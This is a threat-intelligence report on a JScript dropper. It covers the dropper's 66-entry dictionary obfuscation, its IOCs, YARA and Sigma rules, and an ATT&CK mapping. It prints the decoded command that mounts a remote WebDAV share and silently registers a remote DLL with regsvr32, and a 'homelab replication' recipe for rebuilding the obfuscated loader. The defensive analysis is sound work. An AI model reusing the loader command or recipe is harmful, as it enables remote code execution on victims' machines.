typeanalysisfamilyunclassified-js-webdav-dropperconfidencehighcreated2026-07-26updated2026-07-26scriptdropperc2obfuscationdefense-evasionexecution
SHA-256: 2b1c59026010851ed1b303f3db9e2ec71d5f6d19c382db4734c798ca6cc30007

unclassified-js-webdav-dropper: 2b1c5902 — 66-entry dictionary-lookup JScript dropper

Executive Summary

JScript dropper using a 66-entry dictionary-lookup obfuscation (random noise keys) and Function('return this')() constructor assembly to build a WScript.Shell.run() chain that launches a PowerShell -EncodedCommand payload. The encoded payload mounts a WebDAV share at \\94.159.113.204@8888\davwwwroot\ and silently registers 376766747973.dll via regsvr32 /s. One-hundred-and-sixth confirmed sibling in the unclassified-js-webdav-dropper family; seventh on C2 IP 94.159.113.204:8888. Static-only analysis (CAPE skipped — JScript is not a supported binary class).

What It Is

Field Value
SHA-256 2b1c59026010851ed1b303f3db9e2ec71d5f6d19c382db4734c798ca6cc30007
Filename 442929261103923161.js ^[metadata.json]
Size 77,980 bytes ^[exiftool.json]
Family unclassified-js-webdav-dropper
File type ASCII text, single line, no line terminators ^[file.txt]
Triage date 2026-05-26 ^[triage.json]

How It Works

Obfuscation Engine

The script is a single-line JScript file that uses a 66-entry dictionary lookup table with random lowercase noise keys (e.g. hpewdogmld, nnsqqoxusijxfs, aizdlqzkchjb) mapping to individual characters. ^[strings.txt:1]

Dictionary assignments are appended as trailing semicolon-delimited statements after the function body: varname="X";varname="Y";... Each variable is reassigned multiple times (last-wins semantics), yielding 66 unique character mappings. The dictionary is smaller than the 100-entry variants (e.g. fbdd83ad, f51f6323) and larger than the 52-entry direct-variable map observed in 25b576b7. ^[strings.txt:77940]

Execution Chain

The outer wrapper assembles the payload via nested Function('return this')() constructors: ^[strings.txt:1]

function dbinixagjumay(){
  Function('return this')()['eval'](
    Function('return this')()['WScript']['CreateObject']('WScript.Shell')
      ['Run']("powershell -EncodedCommand <base64>", 0, false)
  );
}

The 0, false arguments to .Run() hide the window and do not wait for completion. ^[intercept2.js runtime]

Decoded PowerShell Payload

Runtime interception via Node.js (intercept2.js) captured the actual command passed to WScript.Shell.Run:

timeout 1;qbucpguafd;net use \\94.159.113.204@8888\davwwwroot\;ozunnqevmop;
regsvr32 /s \\94.159.113.204@8888\davwwwroot\376766747973.dll;fazixhjlqwkv

Breaking down the payload: ^[intercept2.js runtime + base64 decode]

  • timeout 1 — anti-emulation delay (1-second sleep before payload execution)
  • net use \\94.159.113.204@8888\davwwwroot\ — mounts the remote WebDAV share
  • regsvr32 /s \\94.159.113.204@8888\davwwwroot\376766747973.dll — silently registers the remote DLL (T1218.010)
  • The noise tokens (qbucpguafd, ozunnqevmop, fazixhjlqwkv) are no-op padding that would execute as invalid commands in PowerShell; their purpose is anti-static obfuscation within the encoded string.

C2 Infrastructure

Indicator Value
WebDAV C2 94.159.113.204:8888
Payload filename 376766747973.dll
Execution method regsvr32 /s via PowerShell -EncodedCommand

This is the seventh confirmed sibling on C2 IP 94.159.113.204:8888, joining fa8c6d74 (65th), ddf0c8bd (80th), edfb0e0a (85th), 771c8752 (90th), 82d78891aa (93rd), and 8ac4b873 (99th). All seven share the same execution engine and subnet but use disjoint dictionary key sets and payload filenames.

Decompiled Behavior

Static-only — no Ghidra/radare2 applicable (JScript text file). The script was decoded via Node.js runtime interception mocking WScript.Shell and eval to capture the payload string without full execution.

C2 Infrastructure

  • IP: 94.159.113.204:8888
  • Protocol: HTTP WebDAV (\\host@port\DavWWWRoot\)
  • Payload: 376766747973.dll
  • Execution: regsvr32 /s (T1218.010)

Interesting Tidbits

  • Dictionary size 66 — intermediate between the 52-entry minimal variants (25b576b7) and the 100-entry maximal variants (fbdd83ad, f51f6323). Suggests the builder randomizes entry count.
  • No batch/polyglot layer — pure JScript, unlike the early da58243c polyglot siblings.
  • No wordpad decoy — absent across all 94.159.113.x subnet siblings.
  • PowerShell -EncodedCommand wrapper present (not all siblings use this; some call WScript.Shell.run() directly).
  • Anti-emulation via timeout 1 inside the encoded payload — a lightweight timing gate.
  • The variable dbinixagjumay (the function name) and the trailing dictionary assignments consume the majority of the file's character count; the actual functional payload is ~5,700 characters.

How To Mess With It (Homelab Replication)

Toolchain: Node.js (or any JS engine with eval and Function)

Obfuscation recipe:

  1. Generate a random dictionary of N entries (here, 66) mapping noise strings to single characters.
  2. Encode your payload string by replacing each character with its corresponding noise key.
  3. Wrap in Function('return this')()['eval'](Function('return this')()['WScript']['CreateObject']('WScript.Shell')['Run'](<encoded_cmd>, 0, false)).
  4. Append trailing assignments as key="char";key="char";... (last assignment wins for each key).

Verification: Mock WScript.Shell in Node.js and intercept .Run() arguments to confirm payload reconstruction.

Deployable Signatures

YARA Rule

rule WEBDAV_JS_Dropper_Dictionary_66Entry {
    meta:
        description = "JScript WebDAV dropper with dictionary-lookup obfuscation (66-entry variant)"
        author = "PacketPursuit"
        date = "2026-07-26"
        hash = "2b1c59026010851ed1b303f3db9e2ec71d5f6d19c382db4734c798ca6cc30007"
    strings:
        $func = "function dbinixagjumay(){Function(" ascii
        $eval_chain = ")()[" ascii
        $wscript = "WScript" ascii
        $trailing = "dbinixagjumay();" ascii
        $webdav = /\\94\.159\.113\.[0-9]{1,3}@8888\\davwwwroot/i
        $regsvr = "regsvr32 /s" ascii
    condition:
        filesize < 100KB and
        $func and $eval_chain and $wscript and $trailing and
        ($webdav or $regsvr)
}

Behavioral Hunt Query (Sigma)

title: WebDAV DLL Registration via JScript Dropper
status: stable
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'regsvr32 /s \\94.159.113'
            - 'rundll32 \\94.159.113'
            - 'net use \\94.159.113'
    condition: selection
falsepositives:
    - Unknown
level: high

IOC List

Type Value
SHA-256 2b1c59026010851ed1b303f3db9e2ec71d5f6d19c382db4734c798ca6cc30007
Filename 442929261103923161.js
C2 IP 94.159.113.204:8888
Payload 376766747973.dll
WebDAV path \\94.159.113.204@8888\davwwwroot\

Behavioral Fingerprint

This JScript dropper uses a dictionary-lookup obfuscation (66 noise-key entries) assembled via Function('return this')() to build a WScript.Shell.Run() call. The executed command is a PowerShell -EncodedCommand payload that mounts a remote WebDAV share via net use and silently registers a DLL via regsvr32 /s. A timeout 1 anti-emulation delay precedes the payload. No decoy, no batch layer, no sandbox gate.

Detection Signatures

Tactic Technique Evidence
Execution T1059.005 (Visual Basic / JScript) JScript .js file opened by WScript ^[strings.txt]
Execution T1059.001 (PowerShell) powershell.exe -EncodedCommand wrapper ^[intercept2.js]
Execution T1218.010 (Regsvr32) regsvr32 /s \\94.159.113.204@8888\davwwwroot\376766747973.dll ^[intercept2.js]
Defense Evasion T1218 (System Binary Proxy Execution) wscript.exe → powershell.exe → regsvr32 proxy chain ^[intercept2.js]
Defense Evasion T1027 (Obfuscated Files or Information) 66-entry dictionary lookup obfuscation ^[strings.txt]
Command & Control T1071.001 (Web Protocols) WebDAV over HTTP (\\host@8888\DavWWWRoot\) ^[intercept2.js]
Command & Control T1105 (Ingress Tool Transfer) net use mounts WebDAV share; regsvr32 fetches remote DLL ^[intercept2.js]

References

Provenance

  • file.txt — file type identification (ASCII text, single line)
  • exiftool.json — metadata (filename, size, MIME type)
  • metadata.json — artifact ID and OpenCTI labels
  • strings.txt — raw JScript content, dictionary assignments, obfuscated payload
  • triage.json — triage timestamp and tier assignment
  • dynamic-analysis.md — CAPE skipped (not a supported binary class)
  • capa.txt — capa error (not a supported file format for PE analysis)
  • floss.txt — floss error (invalid CLI argument)
  • Node.js runtime interception (intercept2.js) executed on 2026-07-26 to decode the PowerShell payload via mocked WScript.Shell and eval capture.